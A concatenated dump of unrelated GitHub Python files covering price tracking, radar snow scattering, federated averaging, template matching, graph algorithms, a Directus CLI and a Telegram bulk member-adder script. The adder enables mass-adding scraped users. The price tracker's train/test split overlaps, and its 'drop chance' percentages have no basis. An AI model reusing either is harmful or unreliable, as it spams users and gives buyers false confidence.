determine_buying_time():\n # Load dataset of product prices over time\n df = pd.read_csv('product_prices.csv', parse_dates=['current_time'])\n\n # Create a column for days since release\n df['days_since_release'] = (df['current_time'] - pd.to_datetime('2022-10-28')).dt.days\n\n # Split the dataset into training and testing sets\n train = df[df['current_time'] < '2024-01-01']\n test = df[df['current_time'] >= '2022-01-01']\n\n # Create a linear regression model and train it on the training set\n model = LinearRegression()\n model.fit(train[['days_since_release']], train['product_price'])\n\n # Use the trained model to make predictions on the testing set\n predictions = model.predict(test[['days_since_release']])\n\n # Calculate the mean squared error of the predictions\n mse = ((predictions - test['product_price']) ** 2).mean()\n\n # Determine if it's a good time to buy the product based on the mean squared error\n if mse < 100:\n return \"This is absolutely the best time to buy this product. Don't miss out, Drop chances are lower than 15%\"\n elif mse < 1000:\n return \"This is a great time to buy this product. Drop chances are very rare and price is unlikely to drop for this product.\"\n elif mse < 10000:\n return \"Price is likely to be dropped for this product. You should wait for a little more to save some money.\"\n else:\n return \"You should absolutely wait for a price drop. Price seems higher than average and drop chances are above 80%\"","repo_name":"Rohan2002Pisal/Academic-projects","sub_path":"PriceTracker.py","file_name":"PriceTracker.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4862930019","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 8 14:41:57 2020\n\n@author: ithan\n\"\"\"\n\nimport numpy as np\n#Q is the Q-value\n#reward is the total reward collected\n#gamma is the discount factor\ndef pSuccess(Q, reward, gamma):\n n = np.log(Q/reward)/np.log(gamma) #corresponde a Eq. 6 del paper. Python no tiene logaritmo en base gamma, pero por propiedades de logaritmos se puede calcular en base 10 y dividir por el logaritmos de gamma. Es lo mismo, cualquier duda revisar propiedades de logaritmos.\n log10baseGamma = np.log(10)/np.log(gamma) # Es un valor constante. Asumiendo que gamma no cambia. Se ocupa en la linea que viene a continuacion\n probOfSuccess = (n / (2*log10baseGamma)) + 1 #Corresponde a Eq. 7 del paper. Sin considerar la parte estocastica.\n probOfSuccessLimit = np.minimum(1,np.maximum(0,probOfSuccess)) #Corresponde a Eq. 9 del paper. Lo mismo anterior, solo que limita la probabilidad a valores entre 0 y 1.\n #probOfSuccessLimit = probOfSuccessLimit * (1 - stochasticity) #Usar solo si usamos transiciones estocasticas o el parametro sigma\n return probOfSuccessLimit\n\n\n#Aca tienes que reemplazar la llamada por los Q-values obtenidos, el reward total que se obtiene al terminar la tarea de forma exitosa y tu discount factor.\nprint(pSuccess(0.6, 1, 0.9))","repo_name":"IthanMoreira/DeppRL","sub_path":"pSuccess.py","file_name":"pSuccess.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19489942299","text":"import asyncio\nimport json\nfrom itertools import dropwhile\nfrom helper.account_handler import add_member, updatecount, addlogin\nfrom colorama import init, Fore\nimport pyfiglet\nimport os, random\n\nlg = Fore.LIGHTGREEN_EX\nrs = Fore.RESET\nr = Fore.RED\nw = Fore.WHITE\ncy = Fore.CYAN\n\n\ninfo = lg + '(' + w + 'i' + lg + ')' + rs\nerror = lg + '(' + r + '!' + lg + ')' + rs\nsuccess = w + '(' + lg + '+' + w + ')' + rs\nINPUT = lg + '(' + cy + '~' + lg + ')' + rs\ncolors = [lg, w, r, cy]\n\n\ndef banner():\n f = pyfiglet.Figlet(font='slant')\n logo = f.renderText('Tele Adder')\n print(random.choice(colors) + logo + rs)\n \ndef clr():\n if os.name == 'nt':\n os.system('cls')\n else:\n os.system('clear')\n\nclr()\nbanner()\nprint(f' {r}Version: {w}3.1 {r}| Author: {w}SAIF ALI{rs}\\n')\nprint(f' {r}Telegram {w}@PrinceXofficial {r}| Instagram: {w}@saifalisew1508{rs}\\n')\n\n\n#option for choose username or id\noption = input('choose method username or id: ').lower() \nasync def main():\n #loads member\n try:\n user_id = (json.load(open(\"data/user.json\", encoding=\"utf-8\")))\n except:\n user_id = (json.load(open(\"data/source_user.json\", encoding=\"utf-8\")))\n\n #loads users and channel info\n config = (json.load(open(\"config.json\", encoding=\"utf-8\")))\n \n \n \n #list to chcek active member\n activelist = ['UserStatus.RECENTLY', 'UserStatus.LAST_MONTH', 'UserStatus.LAST_WEEK', 'UserStatus.OFFLINE', 'UserStatus.RECENTLY', 'UserStatus.ONLINE' ]\n #count retrive old state \n last_active = config[\"from_date_active\"]\n added = 0\n active = []\n for x in dropwhile(lambda y: y != last_active, activelist):\n active.append(x)\n await add_member(user_id, config, active, option)\n\nasyncio.run(main())\n","repo_name":"saifahmed2004/TelegramAdderTool","sub_path":"add_member.py","file_name":"add_member.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"37037761868","text":"#!/usr/bin/env python\n\nimport torch\nfrom collections import OrderedDict # noqa F401\nfrom torch.utils.data import DataLoader\nfrom catalyst.dl.experiments import SupervisedRunner\nfrom catalyst.dl.callbacks import InferCallback, CheckpointCallback\nimport json\nimport yaml\nfrom model import Finetune\nfrom experiment import Experiment\nfrom dataset import IntelSceneDataset\nimport glob\n\n\ncheckpoints = [\n [2, 4, 5],\n [1, 2, 6],\n [1, 3, 5],\n [1, 0, 4],\n [1, 0, 4]\n]\n\nif __name__ == \"__main__\":\n for model_name in [\"densenet121\", \"inception_v3\", \"resnet50\", \"resnet34\", \"resnet18\", \"se_resnet50\"]:\n for fold in range(5):\n log_dir = f\"/media/ngxbac/DATA/logs_datahack/intel-scene/{model_name}_{fold}\"\n with open(f\"{log_dir}/config.json\") as f:\n config = json.load(f)\n\n with open(\"inference.yml\") as f:\n infer_config = yaml.load(f)\n\n model = Finetune(**config['model_params']['params'])\n\n infer_csv = infer_config['data_params']['infer_csv']\n root = infer_config['data_params']['root']\n\n loaders = OrderedDict()\n if infer_csv:\n transforms = Experiment.get_transforms(stage='infer', mode='infer')\n for i, transform in enumerate(transforms):\n inferset = IntelSceneDataset(\n csv_file=infer_csv,\n root=root,\n transform=transform,\n mode='infer'\n )\n\n infer_loader = DataLoader(\n dataset=inferset,\n num_workers=4,\n shuffle=False,\n batch_size=32\n )\n\n loaders[f'infer_{i}'] = infer_loader\n \n all_checkpoints = glob.glob(f\"{log_dir}/checkpoints/stage2.*.pth\")\n\n for i, checkpoint in enumerate(all_checkpoints):\n callbacks = [\n CheckpointCallback(resume=checkpoint),\n InferCallback(out_dir=log_dir, out_prefix=\"/predict_swa_2/predictions.\" + \"{suffix}\" + f\".{i}.npy\")\n ]\n\n runner = SupervisedRunner()\n runner.infer(\n model,\n loaders,\n callbacks,\n verbose=True,\n )\n","repo_name":"ngxbac/datahack-intel-scene","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72571873514","text":"import pandas as pd\n\nproperty_df = pd.read_csv(\"sample_properties.csv\")\n\nresult_df = pd.DataFrame(columns=[\"AmenityName\", \"PropertyId\"])\n\nfor i, prop in property_df.iterrows():\n items = prop[\"amenities\"][1:-1].split(\",\")\n for item in items:\n # Remove quotes\n if item[0] == '\"':\n item = item[1:-1]\n result_df = result_df.append(\n {\"AmenityName\": item, \"PropertyId\": prop[\"id\"]}, ignore_index=True\n )\n\n\nresult_df.to_csv(\"sample_property_amenities.csv\")\n","repo_name":"daviddsouza2000/CSI2132","sub_path":"data/property_amenities.py","file_name":"property_amenities.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1349687979","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n================================================\r\nscattering_snow\r\n================================================\r\n\r\nmodelling of scattering properties of snow\r\n\r\n\"\"\"\r\n\r\n# Author: fvj\r\n# License: BSD 3 clause\r\n\r\nimport datetime\r\nimport argparse\r\nimport atexit\r\nimport glob\r\nimport os\r\nfrom warnings import warn\r\nfrom copy import deepcopy\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom pytmatrix.psd import ExponentialPSD\r\n\r\nfrom scattering_io import read_melting_hydro_part_model\r\nfrom scattering_io import read_scatt_double_layer, read_wavelength_file\r\n\r\nfrom part_descrip import compute_equi_vol_diam\r\n\r\nfrom precip import compute_elwc, compute_equi_rainfall_rate\r\n\r\nfrom refractivity import wavelength_to_band\r\n\r\nfrom scattering import compute_angular_moments, compute_scattering_canting_psd\r\nfrom scattering import compute_angular_moments_analytical\r\n\r\nfrom graph import plot_psd_scatt_profile\r\n\r\nprint(__doc__)\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n main\r\n \"\"\"\r\n # parse the arguments\r\n parser = argparse.ArgumentParser(\r\n description='Entry to snow scattering simulations framework')\r\n\r\n # keyword arguments\r\n parser.add_argument(\r\n '--input_path', type=str,\r\n default='/utemp/mdso/figuerasiventuraj/hydroscatt_products/profile_snow/',\r\n help='input data path')\r\n\r\n parser.add_argument(\r\n '--path', type=str,\r\n default='/utemp/mdso/figuerasiventuraj/hydroscatt_products/profile_snow/',\r\n help='data path')\r\n\r\n parser.add_argument(\r\n '--band', type=str,\r\n default='C',\r\n help='frequency band. Default C')\r\n\r\n parser.add_argument(\r\n '--ele', type=float,\r\n default=0.,\r\n help='elevation angle. Default 0 deg')\r\n\r\n parser.add_argument(\r\n '--rr', type=float,\r\n default=5.,\r\n help='equivalent rainfall rate. Default 5 mm/h')\r\n \r\n parser.add_argument(\r\n '--d_max', type=float,\r\n default=None,\r\n help='Maximum snowflake size. If None it will be that of the input file. Default None')\r\n\r\n parser.add_argument(\r\n '--analytical_cant_angl', type=int,\r\n default=1,\r\n help='If 1 the canting angle will be computed analytically. Default 1')\r\n\r\n args = parser.parse_args()\r\n\r\n print(f'====== snow scattering simulation started: '\r\n f'{datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")}')\r\n atexit.register(_print_end_msg,\r\n \"====== snow scattering simulation finished: \")\r\n\r\n if args.analytical_cant_angl == 1 and args.ele != 0:\r\n warn('The analytical computation of canting angle is only valid for '\r\n 'elevation angles close to 0 deg')\r\n return\r\n\r\n hydro_type = 'melting_snow'\r\n\r\n # Exponential distribution according to Gunn and Marshall\r\n # Ns(Dw) = N0 exp(-lamb*Dw)\r\n # N0 = 3.8e3*R^-0.87\r\n # lamb = 2.55*R^-0.48\r\n hydro_label = f'rreq{args.rr:.1f}_melting_snow'\r\n nw = 8000.\r\n lamb = 4.1*np.power(args.rr, -0.21)\r\n\r\n # parameters\r\n psd_var_list = [\r\n 'refl_h', 'refl_v', 'ldr_h', 'ldr_v', 'zdr', 'rho_hv', 'delta_hv',\r\n 'kdp', 'A_h', 'A_v', 'Adp']\r\n\r\n psd_x_var_list = [\r\n 'refl', 'ldr', 'zdr', 'rho_hv', 'delta_hv', 'kdp', 'A', 'Adp']\r\n psd_y_var_list = ['temp']\r\n\r\n print(hydro_type)\r\n print(hydro_label)\r\n print('n0', nw)\r\n print('lamb', lamb)\r\n print('band', args.band)\r\n print('elevation angle', args.ele)\r\n\r\n flist_model = glob.glob(\r\n f'{args.input_path}sp_{hydro_type}_*_model_part.csv')\r\n flist_scatt = glob.glob(\r\n f'{args.input_path}sp_{hydro_type}_{args.band}_*_tmat.out')\r\n if not flist_model or not flist_scatt:\r\n if not flist_model:\r\n warn(f'no model file at '\r\n f'{args.input_path}sp_{hydro_type}_*_model_part.csv')\r\n if not flist_scatt:\r\n warn(f'no scattering file at '\r\n f'{args.input_path}sp_{hydro_type}_{args.band}'\r\n f'_*_tmat.out')\r\n return\r\n if len(flist_model) != len(flist_scatt):\r\n warn(f'Number of model files {len(flist_model)} different from '\r\n f'number of scattering files {len(flist_scatt)}')\r\n return\r\n\r\n freq_file = (\r\n f'{args.input_path}sp_{hydro_type}_{args.band}_freq.inp')\r\n wavelength = read_wavelength_file(freq_file)\r\n band = wavelength_to_band(wavelength)\r\n\r\n ntemp = len(flist_model)\r\n psd_snow_dict = {\r\n 'temp': np.zeros(ntemp),\r\n 'alt': np.zeros(ntemp),\r\n 'lwc': np.zeros(ntemp),\r\n 'rr': np.zeros(ntemp)\r\n }\r\n for var in psd_var_list:\r\n psd_snow_dict.update({var: np.zeros(ntemp)})\r\n\r\n # output file name\r\n fname = (\r\n f'{args.path}psd_profile_{hydro_label}_{band}'\r\n f'_ele{int(args.ele*100.):05d}_scattering.csv')\r\n for ind_temp, (model_file, scatt_file) in enumerate(zip(\r\n flist_model, flist_scatt)):\r\n df_model, temp = read_melting_hydro_part_model(\r\n model_file, d_max=args.d_max)\r\n n_sf = df_model.shape[0]\r\n df_scatt = read_scatt_double_layer(scatt_file, nrows=n_sf)\r\n\r\n psd_snow_dict['temp'][ind_temp] = temp\r\n print('temp', temp)\r\n print('computing angular moments ...')\r\n canting_angle_snow = 40.+df_model['fmw'].values*(10-40)\r\n if args.analytical_cant_angl:\r\n ang_moments_dict = compute_angular_moments_analytical(\r\n canting_angle_snow)\r\n else:\r\n ang_moments_dict = compute_angular_moments(\r\n canting_angle_snow, ele=args.ele)\r\n\r\n print('computing PSD scattering parameters of melting snowflakes ...')\r\n\r\n # equivalent raindrop diameter\r\n d_rd = compute_equi_vol_diam(df_model['mass'].values)\r\n psd_rain = ExponentialPSD(\r\n N0=nw, Lambda=lamb, D_max=d_rd[-1])\r\n psd_vals_rain = psd_rain(d_rd)\r\n delta_d_rain = d_rd - np.append(0, d_rd[:-1])\r\n\r\n delta_d_snow = (\r\n df_model['d_init'].values\r\n - np.append(0, df_model['d_init'].values[:-1]))\r\n\r\n vel_snow = df_model['vel'].values\r\n\r\n if np.isclose(temp, 0):\r\n vel_snow0 = deepcopy(vel_snow)\r\n\r\n psd_vals_snow = psd_vals_rain*delta_d_rain/delta_d_snow\r\n\r\n # conservation of the flux\r\n psd_vals_snow *= (vel_snow0/vel_snow)\r\n\r\n psd_snow_dict['lwc'][ind_temp] = compute_elwc(\r\n delta_d_snow, df_model['mass'].values, psd_vals_snow)\r\n psd_snow_dict['rr'][ind_temp] = compute_equi_rainfall_rate(\r\n delta_d_snow, df_model['mass'].values, psd_vals_snow,\r\n vel_snow)\r\n\r\n snow_psd_dict = compute_scattering_canting_psd(\r\n wavelength, df_scatt['fv180'].values, df_scatt['fh180'].values,\r\n df_scatt['fv0'].values, df_scatt['fh0'].values, ang_moments_dict,\r\n delta_d_snow, psd_vals_snow, var_list=psd_var_list)\r\n\r\n for var in psd_var_list:\r\n psd_snow_dict[var][ind_temp] = snow_psd_dict[var]\r\n\r\n # save DSD scattering results\r\n psd_snow_dict_aux = {}\r\n for key, value in psd_snow_dict.items():\r\n psd_snow_dict_aux.update({key: [value[ind_temp]]})\r\n df_snow_psd_aux = pd.DataFrame.from_dict(psd_snow_dict_aux)\r\n df_snow_psd_aux.to_csv(\r\n fname, index=False, mode='a', header=not os.path.exists(fname))\r\n print(f'saved {fname}')\r\n\r\n # plot profile\r\n df_snow_psd = pd.DataFrame.from_dict(psd_snow_dict)\r\n plot_psd_scatt_profile(\r\n df_snow_psd, args.path, band, hydro_label, ele=args.ele,\r\n x_var_list=psd_x_var_list, y_var_list=psd_y_var_list)\r\n\r\n\r\ndef _print_end_msg(text):\r\n \"\"\"\r\n prints end message\r\n\r\n Parameters\r\n ----------\r\n text : str\r\n the text to be printed\r\n\r\n Returns\r\n -------\r\n Nothing\r\n\r\n \"\"\"\r\n print(text + datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\"))\r\n\r\n\r\n# ---------------------------------------------------------\r\n# Start main:\r\n# ---------------------------------------------------------\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"openradar/hydroscatt","sub_path":"hydroscatt/scattering_snow_profile.py","file_name":"scattering_snow_profile.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31821254690","text":"import random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom MessageType import MessageType\nfrom Message import ComputeMessage\n\n\ndef fed_avg(caller, targets):\n N = 1000 # number of data points\n model_iterations = 1000\n server_weights = torch.randn(1, 1) * 100\n\n def compute_map(target_ids, result):\n new_results = {}\n for target_id, (X, t) in result.items():\n # initialise client model with server model\n client_model = nn.Linear(1, 1)\n with torch.no_grad():\n client_model.weight.copy_(server_weights)\n\n optimizer = optim.SGD(client_model.parameters(), lr=0.05)\n loss_fn = nn.MSELoss()\n for _ in range(model_iterations):\n optimizer.zero_grad()\n predictions = client_model(X)\n loss = loss_fn(predictions, t)\n loss.backward()\n optimizer.step()\n new_A = list(client_model.parameters())[0].data[0, 0].numpy()\n new_b = list(client_model.parameters())[1].data[0].numpy()\n new_results[target_id] = np.array((new_A, new_b))\n return new_results\n\n def compute_reduce(target_ids, result):\n client_models = np.array(list(result.values()))\n new_params = np.mean(client_models, axis=0)\n return new_params\n \n def fetch_data(target_ids, result):\n A = np.random.uniform(3, 4)\n b = np.random.uniform(5, 6)\n error = 0.1\n X = Variable(torch.randn(N, 1))\n t = A * X + b + Variable(torch.randn(N, 1) * error)\n return (X, t)\n\n compute_functions = {\n MessageType.COMPUTE_AGGREGATE: compute_reduce,\n MessageType.COMPUTE_MAP: compute_map,\n MessageType.DATA: fetch_data,\n }\n\n computation = ComputeMessage('FED_AVG', targets, caller=caller, compute_functions=compute_functions)\n return computation\n","repo_name":"pribanacek/part-iii-project","sub_path":"src/test_computations/federated_average.py","file_name":"federated_average.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11560002434","text":"import cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\nplt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots\r\nplt.rcParams['image.interpolation'] = 'nearest'\r\nplt.rcParams['image.cmap'] = 'gray'\r\nnp.set_printoptions(threshold=np.inf)\r\n\r\n\r\ndef cross_correlation(image, template):\r\n \"\"\"Fast convolution into correlation\"\"\"\r\n Hk, Wk = template.shape\r\n Hi, Wi = image.shape\r\n out = np.zeros((Hi, Wi))\r\n\r\n for i in range(Hi - Hk + 1):\r\n for j in range(Wi - Wk + 1):\r\n out[i + Hk // 2, j + Wk // 2] = np.sum(image[i: i + Hk, j: j + Wk] * template)\r\n return out\r\n\r\n\r\ndef match_template(image_gray, template):\r\n \"\"\"Встроенная функция корреляции в cv2\"\"\"\r\n res = cv2.matchTemplate(image_gray, template, cv2.TM_CCOEFF_NORMED)\r\n plt.figure(figsize=(15, 5))\r\n plt.imshow(res, cmap='gray')\r\n plt.title('Карта корреляции')\r\n plt.show()\r\n\r\n\r\ndef zero_mean_cross_correlation(image, template):\r\n \"\"\"Нормировка по среднему значению шаблона\"\"\"\r\n Hk, Wk = template.shape\r\n Hi, Wi = image.shape\r\n out = np.zeros((Hi, Wi))\r\n mean = np.mean(template)\r\n template = template - mean\r\n\r\n for i in range(Hi - Hk + 1):\r\n for j in range(Wi - Wk + 1):\r\n out[i + Hk // 2, j + Wk // 2] = np.sum(image[i: i + Hk, j: j + Wk] * template)\r\n return out\r\n\r\n\r\ndef draw_correlation(temp, image, cc_matrix, x, y, name):\r\n \"\"\"Выводит графики корреляции\"\"\"\r\n plt.figure(figsize=(20, 15))\r\n plt.subplot(311), plt.imshow(temp), plt.title('Template'), plt.axis('off')\r\n\r\n plt.subplot(312), plt.imshow(image), plt.title('Image'), plt.axis('off')\r\n plt.plot(x, y, 'rx', ms=40, mew=10)\r\n\r\n plt.subplot(313), plt.imshow(cc_matrix), plt.title(name), plt.axis('off')\r\n\r\n\r\n plt.show()\r\n\r\n\r\ndef normalized_cross_correlation(image, template):\r\n \"\"\"Нормированная кросс-корреляция\"\"\"\r\n Hk, Wk = template.shape\r\n Hi, Wi = image.shape\r\n out = np.zeros((Hi, Wi))\r\n mean = np.mean(template)\r\n template = (template - mean) / np.std(template)\r\n\r\n for i in range(Hi - Hk + 1):\r\n for j in range(Wi - Wk + 1):\r\n a = image[i: i + Hk, j: j + Wk]\r\n out[i + Hk // 2, j + Wk // 2] = np.sum((((a - np.mean(a)) / np.std(a)) * template))\r\n return out\r\n\r\n\r\nimage = cv2.imread('images/shelf.jpg')\r\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\nimage_grey = cv2.imread('images/shelf.jpg', 0)\r\ntemp = cv2.imread('images/template.jpg')\r\ntemp = cv2.cvtColor(temp, cv2.COLOR_BGR2RGB)\r\ntemp_grey = cv2.imread('images/template.jpg', 0)\r\n\r\n\r\ncross_correlation_matrix = cross_correlation(image_grey, temp_grey)\r\ny, x = np.unravel_index(cross_correlation_matrix.argmax(), cross_correlation_matrix.shape)\r\ndraw_correlation(temp, image, cross_correlation_matrix, x, y, 'Cross-correlation')\r\n\r\ncross_correlation_matrix = zero_mean_cross_correlation(image_grey, temp_grey)\r\ny, x = np.unravel_index(cross_correlation_matrix.argmax(), cross_correlation_matrix.shape)\r\ndraw_correlation(temp, image, cross_correlation_matrix, x, y, 'Zero mean cross-correlation')\r\n\r\n\r\nimage = cv2.imread('images/shelf_dark.jpg')\r\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\nimage_grey = cv2.imread('images/shelf_dark.jpg', 0)\r\n\r\nout = normalized_cross_correlation(image_grey, temp_grey)\r\ny, x = np.unravel_index(out.argmax(), out.shape)\r\ndraw_correlation(temp, image, out, x, y, 'Normalized cross-correlation')\r\n","repo_name":"Fru1tJu1ce/mipt_cv","sub_path":"cross-correlation/task_2_ch.py","file_name":"task_2_ch.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73249573674","text":"def summary(arr):\n r, acc = [], 0\n for i in range(len(arr) - 1):\n acc += arr[i + 1] - arr[i]\n r.append(acc)\n\n l, r = 0, sum(r)\n res = r\n for i in range(1, len(arr)):\n l += i * (arr[i] - arr[i - 1])\n r -= (len(arr) - i) * (arr[i] - arr[i - 1])\n res += r + l\n\n return res\n\n\nk = int(input())\nn = int(input())\npairs = []\nfor _ in range(n):\n x, y = map(int, input().split())\n pairs.append((x, y))\n\npairs.sort(key=lambda p: p[0])\n\nout = summary(list(map(lambda p: p[0], pairs)))\n\ngroups = {}\nfor pair in pairs:\n x, y = pair[0], pair[1]\n groups[y] = groups.get(y, [])\n groups[y].append(x)\n\nfor key, group in groups.items():\n groups[key] = summary(group)\n\ninp = sum(groups.values())\n\nprint(inp)\nprint(out - inp)\n","repo_name":"priamoryki/ITMO","sub_path":"semester-6/ML/codeforces/F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26542183577","text":"# SWEA 1251 하나로\n\ndef find_set(x):\n if parent[x] < 0:\n return x\n parent[x] = find_set(parent[x])\n return parent[x]\n\ndef union(x, y):\n x = find_set(x)\n y = find_set(y)\n if x == y:\n return\n if x < y:\n parent[x] += parent[y]\n parent[y] = x\n else:\n parent[y] += parent[x]\n parent[x] = y\n return\n\ndef kruskal():\n result = 0\n count = 0\n for e in range(len(edge)):\n w, x, y = edge[e]\n if find_set(x) == find_set(y):\n continue\n result += w ** 2\n union(x, y)\n count += 1\n if count == N - 1:\n break\n return result\n\nfor tc in range(1, int(input()) + 1):\n N = int(input())\n X = list(map(int, input().split()))\n Y = list(map(int, input().split()))\n E = float(input())\n edge = []\n for i in range(N - 1):\n for j in range(i + 1, N):\n x = (X[i] - X[j]) ** 2\n y = (Y[i] - Y[j]) ** 2\n w = (x + y) ** 0.5\n edge.append([w, i, j])\n edge.sort(key = lambda x: x[0])\n parent = [-1] * N\n print(f'#{tc} {(int((kruskal() * E) + 0.5))}')","repo_name":"do-park/swexpertacademy","sub_path":"problem/2006/1251.py","file_name":"1251.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31384476702","text":"from __future__ import print_function, unicode_literals\nfrom PyInquirer import prompt\nimport subprocess\nimport sys, os\nimport re\nfrom Questions import EnvQuestions, PjQuestions\nfrom engine.Validations import EnvValidations\nfrom engine.Validations import ValidationHelper\nfrom engine.Environments import Environments\nfrom engine.Environment import Environment\nfrom engine.Project import Project\nfrom engine.Migration import Migration\nfrom utils import GeneralHelper\nmodule_options = ['<== BACK']\n\n\nclass CommandEnv:\n\n def __init__(self):\n self.envs = None\n self.env = None\n self.main()\n\n def main(self):\n self.envs = Environments()\n self.envs.load()\n if len(self.envs.items) > 0:\n options = ['load', 'create', 'delete', 'reset']\n if Migration.get_migrations():\n options = options + ['download migrations']\n options = options + ['cancel']\n EnvQuestions.introduction[0]['choices'] = options\n\n task_data = prompt(EnvQuestions.introduction)\n try:\n self.interface(task_data)\n except KeyboardInterrupt:\n print('\\n')\n close_data = prompt(EnvQuestions.close)\n try:\n ValidationHelper.check_answers(close_data)\n action = close_data['close_action']\n print(action)\n if action == 'back to main options':\n return self.main()\n else:\n sys.exit(1)\n except KeyboardInterrupt:\n sys.exit(1)\n\n def interface(self, task_data):\n if not task_data:\n raise KeyboardInterrupt\n task = task_data['task']\n if task == 'load':\n self.load()\n CommandPj(Environment(self.env))\n elif task == 'create':\n self.create()\n CommandPj(Environment(self.env))\n elif task == 'delete':\n self.delete()\n elif task == 'reset':\n self.reset()\n elif task == 'download migrations':\n self.download_migrations()\n else:\n sys.exit(1)\n\n def load(self):\n print(self.envs.get())\n if len(self.envs.items) > 0:\n options = map(lambda d: d['ref'], self.envs.items)\n EnvQuestions.load[0]['choices'] = list(options) + [module_options[0]]\n load_data = prompt(EnvQuestions.load)\n ValidationHelper.check_answers(load_data)\n if load_data['env_ref'] == module_options[0]:\n return self.main()\n self.env = load_data['env_ref']\n\n def create(self):\n path = self.check_directus_dir()\n install_data = prompt(EnvQuestions.create)\n ValidationHelper.check_answers(install_data)\n db_user, db_pw = self.get_db_details()\n ref_name = re.sub('[\\W_]+', '', install_data['install_name'])\n env = Environment(\n ref_name=ref_name,\n name=install_data['install_name'],\n path=path,\n db_user=db_user,\n db_pw=db_pw\n )\n self.envs.add(env)\n self.env = ref_name\n\n def delete(self):\n q = EnvQuestions.delete\n q[0]['choices'] = [item['ref'] for item in self.envs.items] + [module_options[0]]\n ref_name = prompt(q[0])['ref_name']\n if ref_name == module_options[0]:\n return self.main()\n delete_data = prompt([q[1], q[2]])\n if delete_data['confirmation']:\n env = Environment(ref_name=ref_name)\n env.delete(keep_db=delete_data['keep_db'])\n self.envs.clear_env(ref_name=ref_name)\n return self.main()\n\n def reset(self):\n reset_data = prompt(EnvQuestions.reset)\n if reset_data['confirmation']:\n for item in self.envs.items:\n env = Environment(ref_name=item['ref'])\n env.delete(keep_db=reset_data['keep_db'])\n self.envs.clear_env(ref_name=item['ref'])\n self.envs.reset()\n self.__init__()\n\n def download_migrations(self):\n path = GeneralHelper.prepare_path(self.check_output_dir())\n Migration.download_migrations(out_dir=path)\n\n @staticmethod\n def get_db_details():\n while True:\n db_data = prompt(EnvQuestions.env_db)\n if EnvValidations.validate_db_connection(\n username=db_data['username'],\n password=db_data['password']\n ):\n break\n return db_data['username'], db_data['password']\n\n @staticmethod\n def check_directus_dir():\n while True:\n os.system(\"bash shell/directoryFinder.sh\")\n path = GeneralHelper.prepare_path(open(\"data/tmp/directusEnv.txt\").read())\n os.remove(\"data/tmp/directusEnv.txt\")\n if EnvValidations.validate_unique_path(path):\n break\n else:\n print(\"\\nX Path not unique, try again...\")\n return path\n\n @staticmethod\n def check_output_dir():\n while True:\n subprocess.run(\"bash shell/outputFinder.sh\", shell=True)\n path = open(\"data/tmp/outPath.txt\").read()\n os.remove(\"data/tmp/outPath.txt\")\n if EnvValidations.validate_unique_path(path):\n break\n else:\n print(\"\\nX Path not unique, try again...\")\n return path\n\nclass CommandPj:\n\n def __init__(self, env):\n self.env = env\n self.pj = None\n self.main()\n\n def main(self):\n print(self.env.ouput())\n self.env.load_projects()\n choices = ['create project', 'link project to database']\n if len(self.env.projects) > 0:\n choices = ['create project', 'project settings','link project to database']\n PjQuestions.introduction[0]['choices'] = choices + [module_options[0]]\n intro_data = prompt(PjQuestions.introduction)\n try:\n ValidationHelper.check_answers(intro_data)\n self.interface(intro_data)\n except KeyboardInterrupt:\n print('\\n')\n close_data = prompt(PjQuestions.close)\n try:\n ValidationHelper.check_answers(close_data)\n action = close_data['close_action']\n print(action)\n if action == 'back to environment options':\n return self.main()\n else:\n sys.exit(1)\n except KeyboardInterrupt:\n sys.exit(1)\n\n def interface(self, intro_data):\n if intro_data['task'] == module_options[0]:\n return CommandEnv()\n elif intro_data['task'] == 'create project':\n self.create()\n elif intro_data['task'] == 'project settings':\n self.project_settings()\n elif intro_data['task'] == 'link project to database':\n self.link_project()\n\n def create(self):\n migration_file=None\n if len(Migration.get_migrations()) > 0:\n migration_data = prompt(PjQuestions.migrations[0])\n ValidationHelper.check_answers(migration_data)\n if migration_data['use_migration']:\n PjQuestions.migrations[1]['choices'] = Migration.get_migrations()\n migration_file = prompt(PjQuestions.migrations[1])['migration_file']\n install_data = prompt(PjQuestions.create)\n ValidationHelper.check_answers(install_data)\n self.pj = Project(\n ref=install_data['install_ref'],\n name=install_data['install_name']\n )\n self.env.add_project(\n project=self.pj,\n migration_file=migration_file\n )\n self.main()\n\n 